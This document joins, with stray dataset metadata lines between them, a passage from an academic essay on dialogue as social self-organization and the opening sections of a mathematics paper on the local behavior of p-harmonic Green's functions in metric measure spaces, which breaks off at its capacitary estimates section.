In every social environment there is tension between the known and the unknown. Like the proverbial caution sign on the highway, “Watch for falling rocks,” every social system marks common coherence and incoherence. Palmer (1998) suggests that all things are known in the context of a community. It is this permanent tension between coherence and incoherence that demands a dialogue that leads to social self-organization. Weick (1979), Berger and Bradac (1982), Berger and Calabrese (1975), Shannon and Weaver (1949), and many others have described communication as a process of uncertainty reduction. Weick (1995) claims that we organize in order to create “sensemaking” environments that have a workable level of certainty. Organizations create a coherent environment where we act with some confidence and predict the effect of our actions. But Weick acknowledges that this is an ongoing process that, while desired, is never fully accomplished. Although each of these theorists rightfully argues that uncertainty reduction is a motive for individual communication, our position is that in dialogue the tension between coherence and incoherence is shared. Consider Tannen’s (1989: 152) description of pleasing conversations that lead to a sense of coherence: “The experience of a perfectly tuned conversation is like an artistic experience. The satisfaction of shared rhythm, shared appreciation of nuance, [and] mutual understanding … surpasses the meaning of words exchanged … It gives a sense of coherence to the world.” Of course coherence, as we achieve it, is temporary and not always shared simultaneously with other participants in a dialogue. It forms the motivation to communicate in dialogue, and it is a hard-won moment more often than an enduring state of clarity. What is enduring, even permanent, is the tension between coherence and incoherence; that is, the rewarding and clarifying ends of dialogue, which can provide the impulse toward dialogue in the first place. Hayles (1999) sees a similar tension in the semiotics of virtuality when she describes tensions between presence and absence, disruption and replication, and pattern and randomness in a self-organizing meaning system. For the participant in a dialogue, each of these tensional qualities is manifest as relative coherence or incoherence. Absence—physical or mental disruption—and randomness lead to incoherence. Presence, replication, and pattern lead to coherence.

THE SOCIAL SYSTEM MARKING VOICE IN THE TENSION BETWEEN MONOVOCALITY AND MUTUALITY

The social system does not merely place a caution on disorder, but also marks order by certifying that some ideas have privilege over others. 
The privilege may come as a result of hyperdemocratization (a majority believe this, so it must be true), scientism (scientific experts certify this, therefore it is true), or some form of orthodoxy. But a majority population implies a minority view, just as experts who separate themselves from the average citizen imply isolation. Orthodoxy, whether religious or otherwise, invites disbelief. Each of these positions has an inherited, permanent tension that exists between the forces of mutuality and hegemonic monovocality. Bohm (1990) tells us that dialogue leverages this tension by moving the group toward shared meaning. Others (Isaacs 1999; Weisbord, 1992) believe that dialogue moves us toward collective action. However, once the collective has formed, it becomes controlling, and resistance then becomes part of the self-organization process. Bakhtin (1981, 1986) said that a monologism, or single voice privileged over multiple voices, is needed to clarify the human condition. Holquist (1990: 24) told us, “in Bakhtin, there is no one meaning being striven for: the world is a vast congeries of contesting meanings, a heteroglossia so varied that no single term capable of unifying its diversifying energies is possible.” This kind of monovocality stands in tension with the mutuality described by Cissna and Anderson (1998) in the Buber-Rogers dialogue. They say that the kind of mutuality articulated by Buber, Rogers, and other theorists of mutuality leads to tension, dialogue, and then unexpected meaning. It emphasizes an individual’s awareness of the uniqueness of others and encourages authenticity. But it does not require the renunciation of roles nor the full disclosure of all personal thoughts. An example of this is the Quaker clearness committee. This is a dialogic form of counseling in which a person who is trying to make an important life decision calls together several trusted friends and family. They will sit in a circle for several hours as those who have been asked to counsel ask only questions of the person who is making the life decision. The questions may not contain prescriptions, such as “Why don’t you try this?” (Palmer, 1998). This process lives in the tension between the monovocal and the mutual. It starts with a monovocal description of the question coming from the person who wants help. It guards the monovocal position by allowing the counselors only to ask questions. However, it evokes mutuality by including the clarity of the questioners and by stirring the wisdom that may lie deep within the person who is trying to make the decision. Evidently, a clearness committee is an attempt to leverage the forces of dialogue and lead a person to find order within their lives, even if the order is temporary.

THE SOCIAL SYSTEM REDEFINING ITSELF THROUGH THE TENSION BETWEEN CONVERGENT AND EMERGENT OUTCOMES

Coherence is temporary, but it is critical because it allows the social system to converge on collective rather than random actions. Over time, social systems that are defined by order will need to redefine themselves. Social self-organization through dialogue is a nonlinear, communicative practice that involves emergent mutuality. As the collective intent of certain groups demands convergence on intended outcomes, a dialogic field of meaning acts much like a “strange attractor,” giving the group’s intention a sense of momentum. 
The vision, collective abilities, and experience of the group create boundary conditions that limit the outcomes, but human agency also opens up the system to infinite possible outcomes within those boundaries. The key question is whether the field is converging on a problem or series of problems, or whether it is open, waiting for a mutual direction to emerge. The convergent-emergent tension is found in the literature of deliberative democracy theory. Habermas (1992) says that people come to a dialogue ready to hear others’ arguments and subject their own arguments to the same criteria of reasonableness and clarity as the positions they originally dislike. This creates communication that builds common ground and increases the chances of consensus. Consensus, reached through deliberation and verbal competition, appears to be the normative goal of convergent dialogue. Such convergent assumptions virtually mandate that unity, in the sense of shared meaning, is “the” goal of dialogue, not merely “a” goal of dialogue. They also keep other important voices out of the dialogue. The task in dialogue is not to submerge voices if they don’t reflect the “right” kinds of rationality, but to do what we can to bring them to the surface as contributors. The convergent-emergent tension is a reflection of the proceduralist-pluralist tension confronting a wide range of public and governmental decision-making situations.

CONCLUSION: DIALOGUE AS SOCIAL SELF-ORGANIZATION

Early in this article we described the characteristics of communicative self-organizing systems by describing a social system’s need to define itself, describe itself, mark order, mark disorder, and converge or emerge on action. We describe these as tensions because a social system is never without some dialogue-creating dispute related to these tensions. To be sure, the dialogue can occur on a variety of levels, including small groups, communities, societies, and even with oneself. We describe these dialogues as social self-organization because they give us, as subjective human beings, our sense of identity, the expectation of certain outcomes, the assumed meaning of communicative acts, a pretense of voice, and a sense of social situation or field. The dialogic self-organization around identity moves toward establishing the self and the other, making clearer the roles of the participants. Dialogue around identity may lead to a re-entrenchment of identity roles or to newly established roles. The tension in dialogue between content and process is also permanent and leads to self-organization. The tension between coherence and incoherence is required to begin dialogue (Kogler, 1996). However, as dialogue continues and fills in the limits of its own meaning, emergence can take over and move the group toward incoherence. Isaacs (1999) describes this as instability. Wheatley (1992) describes it as a productive, localized “chaos” that creates an opportunity for participants to let go of previous assumptions. We suggest that declarations of coherence are essential for self-organizing systems because they allow the system collectively to move forward with confidence. When US President George W. Bush declared coherence on an aggressive foreign policy that would force the disarmament of Iraq, he caused others to demand additional consideration. Congress, the United Nations, and the governments of other nations deliberated carefully to see if they would or could align with his position. 
The declaration of coherence created an opportunity for dialogue even as it was described as an imposition. Kogler (1996: 84) argues that “dialogic understanding can no longer proceed from the idea of a universal consensus … it must … make present one’s own constraints through an understanding of the other, and of gaining knowledge of certain limits of the other through one’s own perspective.” We suggest that coherence and incoherence are ever present in the dialogic experience, surfacing and resurfacing at different times. Finally, we consider voice in the self-organizing mix. In some dialogic situations, in a given time period, the monovocal voice, according to Hawes (1999), sweeps away any opposition. He argues that a single, privileged voice can be tyrannical and oppressive. Ellsworth (1989) says that some populations that are raced, classed, or gendered are so inherently unequal in their identity and access to the process that real dialogue is impossible. Nevertheless, we argue that eventually, perhaps over generations, the system will self-organize and self-correct through the forces of mutuality. This was the hope of Freire (1970: 76-7), who said:

  Dialogue is the encounter between men, mediated by the world, in order to name the world. Hence dialogue cannot occur between those who want to name the world and those who do not wish this naming—between those who deny other men the right to speak their word and those whose right to speak has been denied them.

In recent years there has been a great deal of discussion about self-sustaining organizations. It is clear that organizations that can self-correct toward more ethical behaviors need to sustain the forces of self-organization through dialogue. While there is a danger in the tyrants described by Freire who will keep us from dialogue in order to control the naming of the world, there is a more common danger in those who see dialogue as inefficient. In doing so they deny us access to our identity, pushing us toward a specified coherence spoken by a privileged voice. But more importantly, they deny the system the opportunity to self-organize and hopefully to adapt to our social environments in a more friendly and ethical fashion.
null
minipile
NaturalLanguage
mit
null
---
abstract: 'We describe the behavior of [[$p\mspace{1mu}$]{}]{}-harmonic Green’s functions near a singularity in metric measure spaces equipped with a doubling measure and supporting a Poincaré inequality.'
address:
- |
  Department of Mathematics\
  Purdue University\
  West Lafayette, IN 47907, USA
- |
  Department of Mathematics\
  Purdue University\
  West Lafayette, IN 47907, USA
- |
  Department of Mathematics and Systems Analysis\
  Helsinki University of Technology\
  P.O. Box 1100 FI-02015 TKK\
  Finland
author:
- Donatella Danielli
- Nicola Garofalo
- Niko Marola
title: 'Local behavior of [[$p\mspace{1mu}$]{}]{}-harmonic Green’s functions in metric spaces'
---

[^1] [^2]

*This paper is dedicated to the memory of Professor Juha Heinonen*

Introduction
============

Holopainen and Shanmugalingam [@HoSha] constructed in the metric measure space setting a [[$p\mspace{1mu}$]{}]{}-harmonic Green’s function, called a singular function there, having most of the characteristics of the Green function which is the fundamental solution of the Laplace operator. In this paper we study the following question related to the local behavior of a [[$p\mspace{1mu}$]{}]{}-harmonic Green’s function on a locally doubling metric measure space $X$ supporting a local $(1,p)$-Poincaré inequality: Given a relatively compact domain ${\Omega}\subset X$, $x \in {\Omega}$, and a [[$p\mspace{1mu}$]{}]{}-harmonic Green’s function $G$ with a singularity at $x$, can we describe the behavior of $G$ near $x$? Capacitary estimates for metric rings play an important role in the study of the asymptotic behavior. Following the ideas in the works of Serrin [@Serrin1], [@Serrin2] (see also [@LSW]), such estimates were used in Capogna et al. [@CaDaGa] to establish the local behavior of singular solutions to a large class of nonlinear subelliptic equations which arise in the Carnot–Carathéodory geometry. Sharp capacitary estimates for metric rings with unrelated radii were established in the metric measure space setting in [@GaMa]. Here, we confine ourselves to mention that a fundamental example of the spaces included in this paper is obtained by endowing a connected Riemannian manifold $M$ with the Carathéodory metric $d$ associated with a given subbundle of the tangent bundle, see [@Ca]. If such a subbundle generates the tangent space at every point, then thanks to the theorem of Chow [@Chow] and Rashevsky [@Ra] $(M,d)$ is a metric space. Such metric spaces are known as sub-Riemannian or Carnot-Carathéodory (CC) spaces. By the fundamental works of Rothschild and Stein [@RS], Nagel, Stein and Wainger [@NSW], and of Jerison [@J], every CC space is locally doubling, and it locally satisfies a $(p,p)$-Poincaré inequality for any $1\leq p<\infty$. Another basic example is provided by a Riemannian manifold $(M^n,g)$ with nonnegative Ricci tensor. In such a case, thanks to the Bishop comparison theorem, the doubling condition holds globally, see e.g. [@Ch], whereas the $(1,1)$-Poincaré inequality was proved by Buser [@Bu]. An interesting example to which our results apply and that does not fall in any of the two previously mentioned categories is the space of two infinite closed cones $X=\{(x_1,\ldots, x_n)\in{\mathbb{R}}^n:\ x_1^2+\ldots +x_{n-1}^2\leq x_n^2\}$ equipped with the Euclidean metric of ${\mathbb{R}}^n$ and with the Lebesgue measure. This space is Ahlfors regular, and it is shown in Hajłasz–Koskela [@HaKo Example 4.2] that a $(1,p)$-Poincaré inequality holds in $X$ if and only if $p>n$. 
Another example is obtained by gluing two copies of closed $n$-balls $\{x\in {\mathbb{R}}^n:\ |x|\leq 1\}$, $n\geq 3$, along a line segment. In this way one obtains an Ahlfors regular space that supports a $(1,p)$-Poincaré inequality for $p>n-1$. A thorough overview of analysis on metric spaces can be found in Heinonen [@heinonen]. One should also consult Semmes [@Semmes] and David and Semmes [@DaSem]. Our main result in this paper is a quantitative description of the local behavior of a [[$p\mspace{1mu}$]{}]{}-harmonic Green’s function defined in Holopainen–Shanmugalingam [@HoSha]. We shall prove that a Green’s function $G$ with a singularity at $x_0$ in a relatively compact domain satisfies the asymptotic behavior $$G(x) \approx \biggl(\frac{d(x,x_0)^{p}}{\mu(B(x_0,d(x,x_0)))}\biggr)^{1/(p-1)},$$ where $x$ is uniformly close to $x_0$. Our approach uses upper gradients à la Heinonen and Koskela [@HeKo], and [[$p\mspace{1mu}$]{}]{}-harmonic functions that can be characterized in terms of [[$p\mspace{1mu}$]{}]{}-energy minimizers among functions with the same boundary values in relatively compact subsets. Following [@HoSha] we adopt a definition for Green’s functions that uses an equation for [[$p\mspace{1mu}$]{}]{}-capacities of level sets. We want to stress the fact that even in Carnot groups of homogeneous dimension $Q$ it is not known whether such a [[$p\mspace{1mu}$]{}]{}-harmonic Green’s function is unique when $1<p<Q$. However, in the conformal case, i.e. when $p=Q$, the uniqueness for Green’s function for the $Q$-Laplace equation in Carnot groups was settled by Balogh et al. in [@BHT]. The paper is organized as follows. The second section gathers together the relevant background such as the definition of doubling measures, upper gradients, Poincaré inequality, Newton–Sobolev spaces, and capacity. In Section 3 we recall sharp capacitary estimates for metric rings with unrelated radii proved in Garofalo–Marola [@GaMa]. In Section 4 we give the definition of Green’s functions. We establish the local behavior of Green’s functions in Section 5, and we also prove a result on the local integrability of Green’s functions. Section 6 closes the paper with a result on the local behavior of Cheeger singular functions. In this section our approach uses Cheeger gradients (see Cheeger [@Cheeger]) emerging from a differentiable structure that the ambient metric space admits. In particular, [[$p\mspace{1mu}$]{}]{}-harmonic functions can thus be characterized in terms of a weak formulation of the [[$p\mspace{1mu}$]{}]{}-Laplace equation.

Acknowledgements {#acknowledgements .unnumbered}
----------------

The authors would like to thank Nageswari Shanmugalingam for valuable comments on the manuscript and her interest in the paper. The paper was completed while the third author was visiting Purdue University in 2007–2008. He thanks the Department of Mathematics for the hospitality and several of its faculty for fruitful discussions.

Preliminaries {#prelim}
=============

We begin by stating the main assumptions we make on the metric space $X$ and the measure $\mu$.

General Assumptions {#assumptions}
-------------------

Throughout the paper $X=(X,d,\mu)$ is a locally compact metric space endowed with a metric $d$ and a positive Borel regular measure $\mu$. 
We assume that for every compact set $K\subset X$ there exist constants $C_K \geq 1$, $R_K>0$ and $\tau_K \ge 1$, such that for any $x\in K$ and every $0<r\leq R_K$, $0<\mu(B) <\infty$, where $B:=B(x,r):=\{y\in X:\ d(y,x)<r\}$, and, in particular, one has: - the closed balls $\overline B(x,r)=\{y\in X:d(y,x)\leq r\}$ are compact; - (local doubling condition) $\mu(B(x,2r)) \le C_K \mu(B(x,r))$; - (local weak $(1,p_0)$-Poincaré inequality) there exists $1<p_0<\infty$ such that for all measurable functions $u$ on $X$ and all upper gradients $g_u$ (see Section 2.3) of $u$ $$\label{PI-ineq} \vint_{B(x,r)} |u-u_{B(x,r)}| \,{d\mu}\le C_K r \Big( \vint_{B(x,\tau_K r)} g_u^{p_0} \,{d\mu}\Big)^{1/p_0},$$ where $ u_{B(x,r)} :=\vint_{B(x,r)}u \, d\mu :=\int_{B(x,r)} u\, d\mu/\mu(B(x,r))$. - (X is $\operatorname{LLC}$, i.e. linearly locally connected) there exists a constant $\alpha \geq 1$ such that for all balls $B(x,r)\subset X$, $0<r\leq R_K$, each pair of distinct points in the annulus $B(x,2r)\setminus\overline{B}(x,r)$ can be connected by a rectifiable path in the annulus $B(x,2\alpha r)\setminus\overline{B}(x,r/\alpha)$. Hereafter, the constants $C_K, R_K$ and $\tau_K$ will be referred to as the *local parameters* of $K$. We also say that a constant $C$ depends on the local doubling constant of $K$ if $C$ depends on $C_K$. The above assumptions encompass, e.g., all Riemannian manifolds with Ric $\geq 0$, but they also include all Carnot–Carathéodory spaces, and therefore, in particular, all Carnot groups. For a detailed discussion of these facts we refer the reader to the paper by Garofalo–Nhieu [@GaNhi]. In the case of Carnot–Carathéodory spaces, recall that if the Lie algebra generating vector fields grow at infinity faster than linearly, then the compactness of metric balls of large radii may fail in general. Consider for instance in ${\mathbb{R}}$ the smooth vector field of Hörmander type $X_1=(1+x^2)\frac{d}{dx}$. Some direct calculations prove that the distance relative to $X_1$ is given by $d(x,y)=|\arctan(x)-\arctan(y)|$, and therefore, if $r\geq \pi/2$, we have $B(0,r)={\mathbb{R}}$. Local doubling property ----------------------- We note that assumption (ii) implies that for every compact set $K\subset X$ with local parameters $C_K$ and $R_K$, for any $x\in K$ and every $0<r\leq R_K$, one has for $1\leq \lambda \leq R_K/r$, $$\label{dc} \mu(B(x,\lambda r)) \leq C\lambda^Q\mu(B(x,r)),$$ where $Q=\log_2C_K$, and the constant $C$ depends only on the local doubling constant $C_K$. The exponent $Q$ serves as a local dimension of the doubling measure $\mu$ restricted to the compact set $K$. For $x\in X$ we define the *pointwise dimension* $Q(x)$ by $$\begin{aligned} Q(x) = \sup\{& q > 0:\ \exists C>0\ \textrm{ such that } \\ &\lambda^q\mu(B(x,r)) \leq C\mu(B(x,\lambda r)), \\ & \textrm{ for all } 1\leq\lambda<\operatorname{diam}X \textrm{ and } 0<r<\infty\}.\end{aligned}$$ The inequality readily implies that $Q(x) \leq Q$ for every $x\in K$. Moreover, it follows that $$\label{lowerbound} \lambda^{Q(x)}\mu(B(x,r)) \leq C\mu(B(x,\lambda r))$$ for any $x \in K$, $0<r\leq R_K$ and $1\leq \lambda \leq R_K/r$, and the constant $C$ depends on the local doubling constant $C_K$. Furthermore, for all $0<r\leq R_K$ and $x\in K$ $$\label{bounds} C_1r^Q \leq \frac{\mu(B(x,r))}{\mu(B(x,R_K))} \leq C_2r^{Q(x)},$$ where $C_1=C(K, C_K)$ and $C_2= C(x,K,C_K)$. For more on doubling measures, see, e.g. Heinonen [@heinonen] and the references therein. 
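For orientation, the following standard weighted example (recorded here only as an illustration, not needed in the sequel; the particular weight is our choice) shows that the pointwise dimension may genuinely differ both from the exponent $Q$ and from point to point. On $X={\mathbb{R}}^n$ with the Euclidean metric, let $d\mu=|x|^{\alpha}\,dx$ for some fixed $\alpha>0$. This measure is doubling and $$\mu(B(0,r))\simeq r^{n+\alpha}, \qquad \mu(B(x,r))\simeq |x|^{\alpha}r^{n} \quad \textrm{ for } 0<r\leq |x|/2,$$ from which one checks that $Q(0)=n+\alpha$, whereas $Q(x)=n$ for every $x\neq 0$; on the other hand, for a compact set containing the origin the exponent $Q$ in (\[dc\]) must be at least $n+\alpha$.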
Upper gradients --------------- A nonnegative Borel function $g$ on $X$ is an *upper gradient* of an extended real valued function $f$ on $X$ if for all rectifiable paths $\gamma$ joining points $x$ and $y$ in $X$ we have $$\label{ug-cond} |f(x)-f(y)|\le \int_\gamma g\,ds.$$ whenever both $f(x)$ and $f(y)$ are finite, and $\int_{\gamma}g\, ds=\infty $ otherwise. See Cheeger [@Cheeger], Shanmugalingam [@Sh-rev], and Heinonen–Koskela [@HeKo] for a discussion on upper gradients. If $g$ is a nonnegative measurable function on $X$ and if (\[ug-cond\]) holds for [[$p\mspace{1mu}$]{}]{}-almost every path, then $g$ is a *weak upper gradient* of $f$. By saying that (\[ug-cond\]) holds for [[$p\mspace{1mu}$]{}]{}-almost every path we mean that it fails only for a path family with zero [[$p\mspace{1mu}$]{}]{}-modulus (see, for example, [@Sh-rev]). If $f$ has an upper gradient in $L^p(X)$, then it has a *minimal weak upper gradient* $g_f \in L^p(X)$ in the sense that for every [[$p\mspace{1mu}$]{}]{}-weak upper gradient $g \in L^p(X)$ of $f$, $g_f \le g$ $\mu$-almost everywhere (a.e.), see Corollary 3.7 in Shanmugalingam [@Sh-harm]. The minimal weak upper gradient can be obtained by the formula $$g_f(x) := \inf_g \limsup_{r\to0{{\mathchoice{\raise.17ex\hbox{$\scriptstyle +$}} {\raise.17ex\hbox{$\scriptstyle +$}} {\raise.1ex\hbox{$\scriptscriptstyle +$}} {\scriptscriptstyle +}}}}{\vint}_{B(x,r)} g\,{d\mu},$$ where the infimum is taken over all upper gradients $g \in L^p(X)$ of $f$, see Lemma 2.3 in Björn [@Bj]. Capacity -------- Let ${\Omega}\subset X$ be open and $K \subset {\Omega}$ compact. The *relative [[$p\mspace{1mu}$]{}]{}-capacity* of $K$ with respect to ${\Omega}$ is the number $$\operatorname{Cap}_p (K,{\Omega}) =\inf\int_{\Omega}g_u^p\,d\mu,$$ where the infimum is taken over all functions $u \in {N^{1,p}}(X)$ such that $u=1$ on $K$ and $u=0$ on $X\setminus{\Omega}$. If such functions do not exist, we set $\operatorname{Cap}_p (K,{\Omega})=\infty$. When ${\Omega}=X$ we simply write $\operatorname{Cap}_p(K)$. Observe that the infimum above could be taken over all functions $u \in \operatorname{Lip}_0({\Omega})=\{f \in \operatorname{Lip}(X):\ f=0 \textrm{ on } X\setminus{\Omega}\}$ such that $u=1$ on $K$. In addition, the relative [[$p\mspace{1mu}$]{}]{}-capacity is a Choquet capacity and consequently for all Borel sets $E$ we have $$\operatorname{Cap}_p (E,{\Omega}) = \sup\{\operatorname{Cap}_p(K):\ K\subset E,\ K\textrm{ compact}\}.$$ For other properties as well as equivalent definitions of the capacity we refer to Kilpeläinen et al. [@KiKiMa], Kinnunen–Martio [@KiMa96; @KiMaNov], and Kallunki–Shanmugalingam [@KaSh]. Finally, we say that a property holds *[[$p\mspace{1mu}$]{}]{}-quasieverywhere* if the set of points for which the property does not hold is of zero capacity. Newtonian spaces ---------------- We define Sobolev spaces on the metric space following Shanmugalingam [@Sh-rev]. Let ${\Omega}\subseteq X$ be nonempty and open. Whenever $u\in L^p({\Omega})$, let $$\|u\|_{{N^{1,p}}({\Omega})} = \biggl( \int_{\Omega}|u|^p \, {d\mu}+ \inf_g \int_{\Omega}g^p \, {d\mu}\biggr)^{1/p},$$ where the infimum is taken over all weak upper gradients of $u$. The *Newtonian space* on ${\Omega}$ is the quotient space $${N^{1,p}}({\Omega}) = \{u: \|u\|_{{N^{1,p}}({\Omega})} <\infty \}/{\sim},$$ where $u \sim v$ if and only if $\|u-v\|_{{N^{1,p}}({\Omega})}=0$. The Newtonian space is a Banach space and a lattice, moreover Lipschitz functions are dense, see [@Sh-rev] and Björn et al. [@BBS]. 
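Two model cases may help fix ideas; they are recorded here only for orientation. First, for the distance function $f(x)=d(x_0,x)$ the constant function $g\equiv 1$ is an upper gradient of $f$: for any rectifiable path $\gamma$ joining $x$ and $y$ one has $$|f(x)-f(y)| = |d(x_0,x)-d(x_0,y)| \leq d(x,y) \leq \int_\gamma 1\,ds.$$ Second, in the Euclidean case $X={\mathbb{R}}^n$ with the Lebesgue measure the Newtonian space coincides with the classical Sobolev space, that is, ${N^{1,p}}({\mathbb{R}}^n)=W^{1,p}({\mathbb{R}}^n)$ with $g_f=|\nabla f|$ $\mu$-a.e., cf. [@Sh-rev].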
To be able to compare the boundary values of Newtonian functions we need a Newtonian space with zero boundary values. Let $E$ be a measurable subset of $X$. The *Newtonian space with zero boundary values* is the space $${N^{1,p}}_0(E)=\{u|_{E} : u \in {N^{1,p}}(X) \text{ and } u=0 \text{ on } X {\setminus}E\}.$$ The space ${N^{1,p}}_0(E)$ equipped with the norm inherited from ${N^{1,p}}(X)$ is a Banach space, see Theorem 4.4 in Shanmugalingam [@Sh-harm]. We say that $u$ belongs to the *local Newtonian space* ${N^{1,p}}{_{\rm loc}}(\Omega)$ if $u\in {N^{1,p}}({\Omega}')$ for every open ${\Omega}'\Subset\Omega$ (or equivalently that $u\in {N^{1,p}}(E)$ for every measurable $E\Subset\Omega$). We will also need an inequality for Newtonian functions with zero boundary values. If $f\in{N^{1,p}}_0(B(x,r))$, then there exists a constant $C>0$ only depending on $p$, the local doubling constant, and the constants in the weak Poincaré inequality, such that $$\label{eq:SoboPI} \biggl({\vint}_{B(x,r)}|f|^{p}\, d\mu\biggr)^{1/p} \leq Cr\biggl({\vint}_{B(x,r)}g_f^p\,d\mu\biggr)^{1/p}$$ for every ball $B(x,r)$ with $r\leq \frac1{3}\operatorname{diam}X$. For this result we refer to Kinnunen and Shanmugalingam [@KiSh1]. Differentiable structure ------------------------ Cheeger [@Cheeger] demonstrated that metric measure spaces that satisfy assumptions (ii) and (iii) admit a differentiable structure with which Lipschitz functions can be differentiated almost everywhere. This differentiable structure gives rise to an alternative definition of a Sobolev space over the given metric measure space than defined above. However, assuming (ii) and (iii) these definitions lead to the same space, see Shanmugalingam [@Sh-rev Theorem 4.10]. Thanks to a deep theorem by Cheeger the corresponding Sobolev space is reflexive, see [@Cheeger Theorem 4.48]. The differentiable structure gives the notion of partial derivatives in the following theorem, see Cheeger [@Cheeger Theorem 4.38], and it is compatible with the notion of an upper gradient. Let $X$ be a metric measure space equipped with a doubling Borel regular measure $\mu$. Assume that $X$ admits a weak $(1,p_0)$-Poincaré inequality for some $1<p_0<\infty$. Then there exists measurable sets $U_\alpha$ with positive measure such that $$\mu(X\setminus\bigcup_\alpha U_\alpha) =0,$$ and Lipschitz “coordinate charts” $$\mathcal{X}^\alpha = (X_1^\alpha,\ldots,X_{k(\alpha)}^\alpha):X\to{\mathbb{R}}^{k(\alpha)}$$ such that for each $\alpha$ functions $X_1^\alpha,\ldots,X_{k(\alpha)}^\alpha$ are linearly independent on $U_\alpha$ and $$1\leq k(\alpha) \leq N,$$ where $N$ is a constant depending only on the doubling constant of $\mu$ and the constants in the Poincaré inequality. Moreover, if $f:X\to{\mathbb{R}}$ is Lipschitz, then there exist unique (up to a set of measure zero) bounded vector-valued functions $d^\alpha f:U_\alpha \to {\mathbb{R}}^{k(\alpha)}$ such that $$\lim_{r\to 0{{\mathchoice{\raise.17ex\hbox{$\scriptstyle +$}} {\raise.17ex\hbox{$\scriptstyle +$}} {\raise.1ex\hbox{$\scriptscriptstyle +$}} {\scriptscriptstyle +}}}}\sup_{x\in B(x_0,r)} \frac{|f(x)-f(x_0)-d^\alpha f\cdot(\mathcal{X}^\alpha(x)-\mathcal{X}^\alpha(x_0))|}{r} = 0$$ for $\mu$-a.e. $x_0 \in U_\alpha$. We can assume that the sets $U_\alpha$ are pairwise disjoint, and extend $d^\alpha f$ by zero outside $U_\alpha$. Regard $d^\alpha f$ as vectors in ${\mathbb{R}}^N$ and let $Df := \sum_\alpha d^\alpha f$. 
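As a point of reference (not needed later), in the Euclidean case $X={\mathbb{R}}^n$ with the Lebesgue measure one may take a single chart $U={\mathbb{R}}^n$ with $\mathcal{X}=(x_1,\ldots,x_n)$ and $k=n$, and the theorem reduces to Rademacher’s theorem: for a Lipschitz function $f$ one has $Df=\nabla f$ $\mu$-a.e., so that $$\lim_{r\to 0+}\sup_{x\in B(x_0,r)} \frac{|f(x)-f(x_0)-\nabla f(x_0)\cdot(x-x_0)|}{r} = 0$$ for a.e. $x_0\in{\mathbb{R}}^n$.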
Since, by Shanmugalingam [@Sh-rev Theorem 4.10] and [@Cheeger Theorem 4.47], the Newtonian space $N^{1,p_0}(X)$ is equal to the closure in the $N^{1,p_0}$-norm of the collection of (locally) Lipschitz functions on $X$, the derivation operator $D$ can be extended to all of $N^{1,p_0}(X)$ so that there exists a constant $C>0$ such that $$C^{-1}|Df(x)| \leq g_f(x) \leq C|Df(x)|$$ for all $f\in N^{1,p_0}(X)$ and $\mu$-a.e. $x\in X$. Here the norms $|\cdot|$ can be chosen to be inner product norms. The differential mapping $Df$ satisfies the product and chain rules: if $f$ is a bounded Lipschitz function on $X$, $u\in N^{1,p_0}(X)$, and $h:{\mathbb{R}}\to{\mathbb{R}}$ is continuously differentiable with bounded derivative, then $uf$ and $h\circ u$ both belong to $ N^{1,p_0}(X)$ and $$\begin{aligned} D(uf) & = uDf + fDu; \\ D(h\circ u) & = (h\circ u)'Du.\end{aligned}$$ See the discussion in Cheeger [@Cheeger] and Keith [@Keith].

[[$p\mspace{1mu}$]{}]{}-harmonic functions
------------------------------------------

Let ${\Omega}\subset X$ be a domain. A function $u \in {N^{1,p}}{_{\rm loc}}({\Omega})\cap C({\Omega})$ is *[[$p\mspace{1mu}$]{}]{}-harmonic* in ${\Omega}$ if for all relatively compact sets ${\Omega}'\subset{\Omega}$ and for all ${\varphi}\in {N^{1,p}}_0({\Omega}')$, $$\int_{{\Omega}'}g_u^p\,d\mu \leq \int_{{\Omega}'}g_{u+{\varphi}}^p\,d\mu.$$ It is known that nonnegative [[$p\mspace{1mu}$]{}]{}-harmonic functions satisfy Harnack’s inequality and the strong maximum principle, there are no non-constant nonnegative [[$p\mspace{1mu}$]{}]{}-harmonic functions on all of $X$, and [[$p\mspace{1mu}$]{}]{}-harmonic functions have locally Hölder continuous representatives. See [@KiSh1]. As a consequence of the $\operatorname{LLC}$ property of $X$ a nonnegative [[$p\mspace{1mu}$]{}]{}-harmonic function on an annulus $B(y,Cr)\setminus B(y,r/C)$ satisfies Harnack’s inequality on the sphere $S(y,r)=\{x\in X:\ d(x,y) = r\}$ for sufficiently small $r$, see Björn et al. [@BMcSha Lemma 5.3]. We also say that a function $u \in {N^{1,p}}{_{\rm loc}}({\Omega})\cap C({\Omega})$ is *Cheeger [[$p\mspace{1mu}$]{}]{}-harmonic* in ${\Omega}$ if in the above definition upper gradients $g_u$ and $g_{u+{\varphi}}$ are replaced by $|Du|$ and $|D(u+{\varphi})|$, respectively. Note that by a result in Cheeger [@Cheeger], the Cheeger [[$p\mspace{1mu}$]{}]{}-harmonic functions are [[$p\mspace{1mu}$]{}]{}-quasiminimizers in the sense of, e.g., Kinnunen–Shanmugalingam [@KiSh1]. Moreover, the Cheeger [[$p\mspace{1mu}$]{}]{}-harmonic functions can be characterized in terms of a weak formulation of the [[$p\mspace{1mu}$]{}]{}-Laplace equation: $u$ is Cheeger [[$p\mspace{1mu}$]{}]{}-harmonic if and only if $$\int_{{\Omega}'}|Du|^{p-2}Du\cdot D{\varphi}\, d\mu = 0$$ for all ${\Omega}'$ and ${\varphi}$ as in the above definition.

Capacitary estimates
====================

The aim of this section is to recall sharp capacity estimates for metric rings with unrelated radii proved in [@GaMa]. We emphasize an interesting feature of Theorems \[thm:below\] and \[thm:above\] that cannot be observed in the setting of, for example, Carnot groups: the dependence of the estimates on the center of the ring. This is a consequence of the fact that in the general setting one may have $Q(x_0) \neq Q$ for $x_0 \in X$, see Section \[prelim\]. The results in this section will play an important role in the subsequent developments. 
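Before stating the estimates, it may be useful to keep in mind the Euclidean model case, recalled here only as a consistency check (the computation is classical and not taken from [@GaMa]). For $X={\mathbb{R}}^n$ with the Lebesgue measure, so that $Q(x_0)=Q=n$, and for $1<p_0<n$, an explicit computation with radial competitors gives $$\operatorname{Cap}_{p_0}(\overline{B}(x_0,r),B(x_0,R)) = c(n,p_0)\Bigl(r^{\frac{p_0-n}{p_0-1}}-R^{\frac{p_0-n}{p_0-1}}\Bigr)^{1-p_0}, \qquad 0<r<R,$$ which for $r\leq R/2$ is comparable to $r^{n-p_0}\simeq \mu(B(x_0,r))/r^{p_0}$. This is precisely the shape of the bounds in Theorems \[thm:below\] and \[thm:above\] below.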
